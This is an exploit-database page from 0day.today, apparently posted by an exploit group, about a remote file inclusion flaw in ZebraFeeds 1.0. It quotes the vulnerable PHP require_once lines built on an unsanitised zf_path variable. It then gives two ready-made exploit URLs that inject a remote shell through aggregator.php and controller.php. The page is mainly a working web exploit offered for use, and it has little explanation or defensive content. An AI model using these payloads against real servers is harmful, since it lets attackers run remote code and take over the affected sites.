[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities

Author
ThE dE@Th
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1505
Category
web applications
Date add
15-02-2007
Platform
unsorted
============================================================
ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities
============================================================




Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}>>
******************************************************************************
aggregator.php:-
require_once($zf_path . 'includes/feed.php');
require_once($zf_path . 'includes/view.php');
require_once($zf_path . 'includes/template.php');
require_once($zf_path . 'magpierss/rss_fetch.inc');

controller.php:-
require_once($zf_path . 'includes/template.php');
require_once($zf_path . 'includes/opml.php');

********************************************************************************
ExPlOiT:-http://www.SitE.com/newsfeeds/includes/aggregator.php?zf_path=[Shell]
ExPlOiT:-http://www.SitE.com/newsfeeds/includes/controller.php?zf_path=[Shell]
*******************************************************************************



#  0day.today [2024-12-25]  #